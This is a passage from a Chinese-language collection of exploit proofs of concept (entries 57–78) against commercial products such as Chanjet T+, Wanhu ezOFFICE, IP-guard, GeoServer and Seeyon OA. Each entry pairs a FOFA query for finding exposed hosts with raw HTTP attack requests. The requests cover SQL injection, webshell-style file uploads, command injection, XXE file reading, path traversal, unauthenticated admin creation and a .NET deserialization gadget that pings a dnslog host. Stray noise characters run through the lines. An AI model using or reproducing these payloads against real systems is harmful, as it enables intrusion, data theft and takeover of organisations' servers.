{+ }2 C+ r- P* _( \, E- Q4 v, i' {
"storeID":{7 N2 ~/ k) j4 n" s% d+ B; v
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
C+ G$ w0 H$ T6 Y4 N "MethodName":"Start",
$ Q4 i) p# n; O( l4 T% [ "ObjectInstance":{
# Z' ^/ V4 s, p "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
$ m C1 ^6 C; U; N% D5 { "StartInfo": {- h% B4 H1 P" E" e6 g. H- _& M' D
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",2 l" I! t( p$ p
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"7 L5 u+ M, a+ s( p- ^9 D8 U
}
# W7 v' i& X5 i9 W+ f6 @: E }# r3 D/ R" _0 H {0 n
}% P- x0 m1 w6 m1 u
}' m6 I" E) w" y" L Z) _5 }/ G
+ z1 D6 _& D! ^! p3 e/ Z- `
( s c; y) r' @57. 畅捷通T+ keyEdit.aspx SQL注入
" n1 D% ^& T7 ?0 d( e+ GFOFA:app="畅捷通-TPlus"
2 ^6 A5 H* \, J" h9 T/ {' GGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
# [; e! g; u" W$ y$ ]% x* E0 `Host: host
5 `) m; P" V$ a. w3 s" ZUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36% D5 i; c- K$ J
Accept-Charset: utf-8
' a1 {5 ^+ o3 y4 NAccept-Encoding: gzip, deflate
9 \8 H4 S( r# yConnection: close
. D: P, Z# x; F+ r/ n K
# W I$ i4 N; A0 n. B: _* q( A5 q9 A# H. l# T- U
58. 畅捷通T+ KeyInfoList.aspx sql注入3 v' C0 N( G5 _8 F( z' D; m
FOFA:app="畅捷通-TPlus"
: J+ u: d# ?: b/ ?" ?$ C: b' bGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
- y H F- \2 I0 PHost: your-ip2 Y) F8 x% j9 R- @
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. w2 w; Z' [" M) @, W1 r
Accept-Charset: utf-8
( s: A I4 Z* T7 {0 Z' r5 D$ @Accept-Encoding: gzip, deflate+ ]& b1 Z3 a. G5 w3 V* w& j7 K
Connection: close
3 X" I5 A/ ~5 A! s1 a
# B1 q8 _1 b1 m6 B8 M0 w( W4 U% _& P7 N/ @# r6 ?8 R$ V0 d
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行* N6 x# k2 o3 Q& N4 R( C! k
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"& h4 [' H$ a. C" o0 c
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
3 H' d8 I& d# X' k& L3 t C4 jHost: 192.168.86.128:9090
0 i9 G: P, H6 tUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
3 ~$ o+ @2 E8 M4 W" X) q; s3 j" [/ HConnection: close& M( |9 O8 v* c0 `
Content-Length: 1669
. p; T r3 g) h: n" O. xAccept: */*' X" H; f z5 d. q4 S8 v2 f: ~ K' k
Accept-Language: en
( x, o7 Y3 Y3 j8 e0 m8 [$ K6 JContent-Type: application/x-www-form-urlencoded
+ k" g' e& D: m7 C6 p% T# @# RAccept-Encoding: gzip& f& \3 n' q7 a, {, d
* B7 X/ M6 |- l+ b3 |
PAYLOAD! p: K* Y3 }3 }+ s
; c8 L9 [7 E" M! Y4 V) r- Q. T5 q* q
% f) N2 v, X$ m7 v+ J, C3 h/ v" j
60. 百卓Smart管理平台 importexport.php SQL注入: j4 O P+ h" c$ G
FOFA:title="Smart管理平台"3 Q# d" t; V$ w v% C( I6 L V; A
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
% h6 f; c2 n/ `. Z8 h1 }Host:
' L3 H$ |8 A: k' |) jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
L7 y( d7 w- T: _8 C* }' a3 s( wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# M' p& j5 M' u9 c8 u3 FAccept-Encoding: gzip, deflate
: W& U9 Y/ j% v; eAccept-Language: zh-CN,zh;q=0.9
6 S; Z! p% b0 T- {; c7 bConnection: close
; c U6 B3 N! J5 M6 }, d k( p/ Z6 I% y4 W
; W- p* v! c! g$ H61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
5 B$ Q8 Q' [7 j3 P0 t8 mFOFA: title="欢迎使用浙大恩特客户资源管理系统"
; y. x! x5 R& KPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1; I% q6 v1 n7 x2 v. T- g
Host: x.x.x.x( [9 v q+ B# w7 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ R. W8 K* W0 e+ j. X5 g+ Z
Connection: close
8 w& H! C$ x4 \Content-Length: 27" ~. D! X3 b" R. ?2 {5 o
Accept: */*
" f$ {, a( {3 lAccept-Encoding: gzip, deflate
+ e0 }% @2 r9 E5 G& W5 n: V0 W1 ZAccept-Language: en0 P/ R! @7 s/ i: b0 n
Content-Type: application/x-www-form-urlencoded( [% {) H& Y& D- b# q) s& E
7 l" _# ~$ |8 \6 k* L5 |& F" ]8uxssX66eqrqtKObcVa0kid98xa
3 [% n. l8 v5 Y: L7 I: B6 f6 `! e5 p0 d+ `" n
0 {* |) t% W# K; P
62. IP-guard WebServer 远程命令执行: Q( c% ]; x" e, m$ C; _& T
FOFA:"IP-guard" && icon_hash="2030860561"
: z2 E3 Y3 h( h* N8 uGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1# m$ E) s% f5 J4 A4 z
Host: x.x.x.x
. z/ M' z, m5 y) M9 t, F: |User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
- }% l, q$ v2 I6 B2 G# P. VConnection: close
6 C! U& e9 U/ W! VAccept: */*- ]( l5 J& w1 i' p8 ?- ~" c
Accept-Language: en4 G9 ?$ r( N4 w% X0 Z
Accept-Encoding: gzip% U5 X) [$ `* o& |% \( l
6 u% w$ [1 v% I! y
Y+ S q' U$ k3 u& ^" ~访问
6 F9 R1 \3 _9 F' Z; N7 F7 v' E) s7 T1 y J( f
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
/ T5 O7 W* Y6 S* Q8 x# F0 o% wHost: x.x.x.x1 {7 r/ \! g: r+ d+ e7 i5 V- ~
" f! J8 \* W& _/ N0 _$ _# _5 T% x' D1 N3 E" L
63. IP-guard WebServer任意文件读取8 O4 Y+ d1 `1 O% }; \
IP-guard < 4.82.0609.0' r6 B& v# B- Y3 d
FOFA:icon_hash="2030860561"
' o h: Q8 D4 q$ ]POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
6 T$ W. i; E( g2 \$ [Host: your-ip
# i" ^3 Q/ R; U& h9 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- W) b' z8 s0 I0 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% r9 D- h5 `; Y5 i6 c
Accept-Encoding: gzip, deflate
* c8 r0 x" D. n0 KAccept-Language: zh-CN,zh;q=0.9: d; c9 z; @4 C5 s* _: e# x& D% |
Connection: close' D3 p3 w" F4 U) {6 w0 ?
Content-Type: application/x-www-form-urlencoded
& l& X9 d- F" f, F; l: k7 L& m$ e* [$ Q
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
; J+ ^6 n/ p b1 ?3 \1 ?: A* j, |) \6 C% F' @5 o
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
( t/ |3 c& V+ y1 |( Q' I. {8 |2 EFOFA:body="/Scripts/EnjoyMsg.js"# ?) ^2 S' G- R2 k1 P9 }
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
9 t X! _% [7 d3 z# QHost: 192.168.86.128:90018 }4 Y$ ^: e! B- [( c: O
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
5 O9 e3 b$ L, RConnection: close
; U2 O. f0 ~& n0 `' j( k, wContent-Length: 369
! a9 J. P8 K* M, k$ IAccept: */*; [# @8 o& B, P
Accept-Language: en
" W# J1 a$ O* N$ V$ a. oContent-Type: text/xml; charset=utf-81 S$ s: k% _! }; w
Accept-Encoding: gzip! H2 G: {9 e3 A: X* K
2 p8 [! X- K" y2 [. a; _
<?xml version="1.0" encoding="utf-8"?>( Q1 R. r+ }# _- y
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! D3 a# o# x: r- ]( r: v2 P3 H<soap:Body>
! D/ b2 ~6 |7 K+ G2 @6 T <GetOSpById xmlns="http://tempuri.org/">& `# f) O4 c _ ~ ~ ^& H! Z
<sId>1';waitfor delay '0:0:5'--+</sId>
% K# ]4 j# b$ [8 K* Z# k6 C </GetOSpById>
9 i6 u9 R4 v# @9 \; N </soap:Body>
: d. z% z4 H- q8 U! Z</soap:Envelope>
) {' m4 N, P7 \% c! ?4 S1 [* J. H4 X. b0 u7 U, ~! o
- h1 R$ T! ~4 } C65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
+ K) h e5 S: [3 U( N' T: K6 B* zFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
+ N3 K, ]/ N+ s6 s) [4 ^响应200即成功创建账号test123456/1234567 i4 W0 G! V( q
POST /SystemMng.ashx HTTP/1.1
7 {3 {% T8 m* U6 ]Host:
6 E# [6 m3 B& H8 M) gUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
% |0 j2 R$ \- R& g$ pAccept-Encoding: gzip, deflate9 }" r) D4 O; Q G/ ]
Accept: */*! l0 n( Z; D9 Z- P" x6 \+ e( b6 V
Connection: close, g0 U& V( A$ E5 V
Accept-Language: en
- r/ S4 b# B, h: m: u* u, e: ]Content-Length: 1740 m* `3 J3 |' W* G0 j, X
+ c& d6 _# r* \9 i1 M! m& KoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators6 ]# p+ }; h/ x) d+ D5 A
( Y. Z8 M% f1 R* r" K$ N9 g; R R3 _# N. t" `
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
0 O6 I5 l$ ]! [: }. t/ q. h; JFOFA:app="万户ezOFFICE协同管理平台"8 C T2 N5 N/ i1 X
`9 ^, C( \! vGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
" Z% E; G/ {* T. d9 t$ pHost: x.x.x.x
8 W0 W+ W7 X! w) c; @" KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
6 M: S6 P4 v0 y" f' a6 u2 lConnection: close
, Z" m( n; N3 `! n, b7 qAccept: */*
+ c' U( |; T R! eAccept-Language: en% x4 I: G5 ?) R/ y4 ~
Accept-Encoding: gzip. n; F# B. Y4 Y2 `5 q% `# ]
e* k3 n8 r6 q$ b1 f3 ?
5 z5 |4 N* C3 A5 y第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在; u4 ]( `" S$ z6 K$ Y& i
6 R# p9 m. V' K& Z! v67. 万户ezOFFICE wpsservlet任意文件上传& d' p/ J3 P! |- z2 k) b k
FOFA:app="万户网络-ezOFFICE"
' e4 E2 T+ b4 p9 H& X; L, HnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
/ {; j+ n2 X; y# CPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
# \- W% G$ H$ b1 y7 m% B2 nHost: x.x.x.x
4 o# d' w; q: C8 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0( h6 z+ ^) x! t- [
Content-Length: 1737 Z& e& c6 ^& O1 m4 }9 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
, M% \' x7 c/ i1 wAccept-Encoding: gzip, deflate
( H5 [% F6 l2 m7 f5 N' h) eAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.35 p+ X, Z! \5 B
Connection: close
" C. M3 F9 J B1 k# cContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
' j, }9 o E+ R% ], y3 oDNT: 1
- g g2 S. d- M7 T1 m8 aUpgrade-Insecure-Requests: 1
7 O3 q" o' t" x7 {
; X" `6 L: v: \0 A7 f5 I--ufuadpxathqvxfqnuyuqaozvseiueerp
/ f" I' S9 q8 aContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"$ d1 I- b S# L: P0 h, E
# _, F% u5 m; X# r/ w, u
<% out.print("sasdfghjkj");%>. c! R1 E S! ~8 g. F/ ]
--ufuadpxathqvxfqnuyuqaozvseiueerp--
. }2 |3 _' a5 Q# N5 C; M& p4 B
4 [1 C% f* t: M& d1 B* _& J) i; }, t- n- |! s
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp# a8 M# j; m. P& T, [+ p
- {6 D1 o8 [8 v! h+ h0 ?5 \7 u
68. 万户ezOFFICE wf_printnum.jsp SQL注入 @2 m+ o9 J. x7 I
FOFA:app="万户ezOFFICE协同管理平台"
# s0 A" ^; z! E" h. |GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
" ~1 F* @. b1 H% J1 h* DHost: {{host}}3 _* s( B8 }3 W) |' D% l2 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36. e5 F/ ]0 ^5 r" q+ o
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8 }; |! i# J) ?! V
Accept-Encoding: gzip, deflate! d. g6 u" p% D- O
Accept-Language: zh-CN,zh;q=0.9: F5 ~, y! v" h1 M! a
Connection: close
& C. x4 R8 z7 F4 L/ g" e% y4 q, ^8 P) d: l& _
% c) a! n ~( L# _9 u0 \1 E
69. 万户 ezOFFICE contract_gd.jsp SQL注入& D4 u( q3 t3 i4 z
FOFA:app="万户ezOFFICE协同管理平台"
" X; ~7 ?+ R P8 dGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1& C6 F9 L0 ^- `) l
Host: your-ip- r6 s1 w* s H# R
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- z# x# [4 `# d. BAccept-Encoding: gzip, deflate* n3 y1 k% O5 Q4 O% C7 W% @3 Q
Accept: */*7 c$ I1 b7 k. R- _& {
Connection: keep-alive
8 T7 v! J$ h3 G0 ]" f0 r+ R* r- z5 o0 Q
3 {) ~0 T- r" a70. 万户ezEIP success 命令执行; |! z9 `+ V& Z, s9 F7 }
FOFA:app="万户网络-ezEIP". s0 W1 e# X% m/ ^$ m% v1 y6 h: o
POST /member/success.aspx HTTP/1.19 B t4 p6 i9 j- K8 O
Host: {{Hostname}}
( M8 d# o* m; r0 p. R6 \. a4 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.368 Q- C4 a6 v n
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
; ^! X, F( ^. }% [8 {# M9 y( k0 EContent-Type: application/x-www-form-urlencoded5 z; o& `* H$ x3 p5 N
TYPE: C; l" K2 b( Z1 y' C! ?* n; C6 Q
Content-Length: 16702" r; V% ?+ P1 w6 ?7 J/ p! L; w& [4 f
: s+ n5 A7 D/ X# _% @
__VIEWSTATE=PAYLOAD
. C$ s2 p0 B6 `
+ {5 z( p8 h* v8 ^" ]# q# p# F2 w) e0 O# s# A9 ~) k4 [
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入$ G' m$ {. E$ c8 Q: X0 e
FOFA:body="PM2项目管理系统BS版增强工具.zip"
- Z, ?# @) i4 J; c; V# n9 JGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1. _! r | p* w6 m' @) Z' L: @
Host: x.x.x.xx.x.x.x
1 T2 a3 ~3 ?0 V6 n y2 E3 K! xUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
, g' Y( C; d! ^0 HConnection: close
! Q5 j. b5 P& u" j* j) J u1 b0 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 \5 m7 f' T5 A/ z/ E0 C
Accept-Encoding: gzip, deflate5 J4 n7 D) i3 J, F/ w& |" G$ ^( ~- A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& \- D Y8 V% [; y+ a
Upgrade-Insecure-Requests: 1
7 N9 t' G$ v" S' h% G! x f2 \2 @) l# e6 o' b. ]
' Y; ?; z+ @ {; `* j, Q# w72. 致远OA getAjaxDataServlet XXE; a. R; x: L* w9 e, S7 U' ~" K" m
FOFA:app="致远互联-OA"" S# s' U' d3 E. W) ~: C
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
! `9 w+ U. P5 K2 e0 |. G1 ^4 KHost: 192.168.40.131:80998 ?+ J, l$ c( s4 O4 L
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36! s' t: l% J2 E0 u3 R5 s
Connection: close y; }0 r: s: r
Content-Length: 5838 }+ R6 t4 f# E
Content-Type: application/x-www-form-urlencoded
* o9 _; i* z6 o0 XAccept-Encoding: gzip
# L6 a2 w. N+ j4 f* G6 x9 A. L# M% J
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
1 o+ ~8 x/ u+ o P
- w7 J$ u& v b
- I- U8 r- n9 `! v r' z) ]73. GeoServer wms远程代码执行/ }6 D: k" e, L/ Z, u% _! F
FOFA:icon_hash=”97540678”
) w# D9 C$ q) f! D2 bPOST /geoserver/wms HTTP/1.1! _+ D- k( O) E5 O& N
Host:
8 |1 b j# ?2 a. zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& S7 w2 u- \6 O8 N* u" v }Content-Length: 1981
& J2 Y' O' A8 `, b5 r" JAccept-Encoding: gzip, deflate
/ j7 O+ o2 f3 fConnection: close; N: r/ y- W7 D6 H* G% ]
Content-Type: application/xml4 _# E/ O. i2 c, b
SL-CE-SUID: 3
7 l- S7 h! R1 V6 |! z; W1 S- o; }3 c! c% p
PAYLOAD
0 s' o" w' z6 v1 A
2 u6 D2 c2 O. t( {) d) J- i8 H- P3 N# F
74. 致远M3-server 6_1sp1 反序列化RCE
: I! ]- |9 S1 n4 g4 }( @4 N! z* qFOFA:title="M3-Server": r' `( l* m( {7 d/ B5 n( q
PAYLOAD! R y' B$ d" ?# {5 r
1 L2 A0 j) _4 P/ d: M$ O/ Z
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
! ^4 W) F" R* N9 w1 KFOFA:app="TELESQUARE-TLR-2005KSH". F' ^. i- q2 I
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.15 J+ O! G) R2 y
Host: x.x.x.x2 Z1 d- t! }1 e3 a- n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 m! Z/ j" c0 n0 ]" G, ]Connection: close" a, [5 W+ _6 R# G2 ]) A9 H
Accept: */*' C" n. T# O# o! Z$ Q1 I: e2 e3 s, P! b/ S
Accept-Language: en/ J0 F8 ~% j) }: M+ Z; S
Accept-Encoding: gzip
9 B8 n) _* R. _9 ]1 g8 D; \6 t# A# Z6 U5 C; y, _0 e
; N; F/ f0 {3 f1 f5 \
GET /cgi-bin/test28256.txt HTTP/1.1
- F3 }5 [0 a9 u! P# _Host: x.x.x.x
$ g7 |3 T8 C% i% t) t7 X0 h0 f+ w4 `
+ G2 Y& B2 O) y; c: e' m/ c. t/ P/ G( X
76. 新开普掌上校园服务管理平台service.action远程命令执行
) U$ B5 {% r# t. fFOFA:title="掌上校园服务管理平台"! {: I# o2 ?4 x7 D0 {$ G( e3 G3 t9 D/ w
POST /service_transport/service.action HTTP/1.1
6 P6 s5 V; r# g6 uHost: x.x.x.x
% U8 e, Y# T- U0 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
0 {6 w8 l C' E* F* s# K$ Y& [Connection: close
3 O! y# B4 x+ N% e8 Q- XContent-Length: 211
6 y+ l) |4 ?" QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 l8 [ V, u9 ]6 `. n% W: _; XAccept-Encoding: gzip, deflate
: x- z% u( _& |/ O8 j" p- Z# w8 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ D9 I9 Q% ~' G1 m
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4/ W1 A2 h" Y; F0 m2 _0 B
Upgrade-Insecure-Requests: 16 W$ O4 A7 }! o/ K9 y
& m' _! W8 m4 m# B" E
{7 Z) A& _% N8 ~$ T
"command": "GetFZinfo",
, l2 p1 `1 G5 H- ^# \ "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"5 f4 ^! l ~& c$ \' k, p
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
2 H# K6 r ]1 s- i}: J* H6 k0 v: S
4 H& v% S; \7 F$ g3 g# J* p# ]! Y+ [ H7 |% G3 t. z+ X
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
7 M, m! ]% T7 S& }6 r; YHost: x.x.x.x" K" z" E! U# X+ p
4 S" W& {8 W1 n0 T+ R1 i# K
8 ~% s/ z# @& Q' ]" g
- n' ?7 \; i9 ?" l77. F22服装管理软件系统UploadHandler.ashx任意文件上传
8 o4 h, B1 v& O( E+ N8 o; W# {FOFA:body="F22WEB登陆"/ q" I$ I1 d5 Q j& d
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
7 ` q4 u3 Z i% z% U/ |' GHost: x.x.x.x: s, y* R$ g( P4 v- U* _+ Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 Q% v$ U- e/ w) Z JConnection: close( B g1 X, j4 i9 d
Content-Length: 4337 L Y4 E0 s# p* m6 l) m: p
Accept: */*
) o+ | V U3 Q% S. r; WAccept-Encoding: gzip, deflate
2 o8 U( q. W7 l; z. DAccept-Language: zh-CN,zh;q=0.9
' ?4 z, M9 P5 ]& {& k! NContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
# F9 d% C7 w3 ~/ G6 T% w
" b% N0 H% j2 x8 s- h# Q1 e: R------------398jnjVTTlDVXHlE7yYnfwBoix9 A1 s9 E0 P$ ^& u+ ~7 k* m
Content-Disposition: form-data; name="folder"0 w1 R! S, \& c. J5 N+ l" y
, J9 }; N+ x# P& a" E
/upload/udplog$ M" k: y# B6 G3 D2 N+ c% \& i3 ~
------------398jnjVTTlDVXHlE7yYnfwBoix0 k4 A* Y% G( x) @& Q# U* r1 y
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"7 k2 O) K6 S" F x% Y( ]$ H
Content-Type: application/octet-stream
- {2 ^5 z# N v {- T. w# N7 W7 h; M3 S% ^/ z$ t
hello12345677 q2 ]3 ]1 F! J) Y+ k- D
------------398jnjVTTlDVXHlE7yYnfwBoix
; {# c1 @ E! f7 y! t: k0 F+ g- TContent-Disposition: form-data; name="Upload"
8 h: Z4 D( y6 v+ X, N3 g
& j4 [3 l' O' H) ]Submit Query
0 X2 ^0 R8 B+ h7 V4 j5 H------------398jnjVTTlDVXHlE7yYnfwBoix--
+ I- V' k1 q1 y& N
/ [ j* E; h1 r Y7 a3 g+ N( y- G9 t/ J0 Z
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
" X& A2 {! W+ ZFOFA:icon_hash="2001627082"" I. W0 w/ d! c% u" e, b7 p
POST /Platform/System/FileUpload.ashx HTTP/1.1
- q' K% R, m: m1 h5 tHost: x.x.x.x( I. k9 A4 E. {7 Z6 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 t) D# q0 H( n8 zConnection: close
/ V0 d7 Z0 q3 h: i5 }Content-Length: 336
# g8 W' k) \/ x: v# M c+ O3 \0 v eAccept-Encoding: gzip) [. X. w+ Q6 ^* M4 l
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l0 h% e% ?& _. d D3 c
4 B- A9 t3 x; R9 R3 P$ O7 P------YsOxWxSvj1KyZow1PTsh98fdu6l
& e5 A* N* F" L: u& vContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
7 Y- K+ X/ w* y9 L4 r. gContent-Type: image/png1 w+ \8 G. e/ ^2 Y1 _% S
8 p) c& a' x/ r7 X1 p2 AYsOxWxSvj1KyZow1PTsh98fdu6l& \3 ~( S; W% @4 M" Q$ G
------YsOxWxSvj1KyZow1PTsh98fdu6l2 x; u9 I& a7 s* K6 f
Content-Disposition: form-data; name="target"
9 g# T7 k1 l- q& |# \' N* H c8 z0 [+ j( H9 b) |+ g* L
/Applications/SkillDevelopAndEHS/
! Y+ o4 F, h4 ^7 T& M4 h------YsOxWxSvj1KyZow1PTsh98fdu6l--
8 q1 p3 v9 L, G% o* E* U/ K: n3 H2 R& Y9 W6 Y# s' Q9 w/ ?
, t6 o4 R2 D j' G, S, p' zGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1$ T! a" i( x: u& {4 T
Host: x.x.x.x
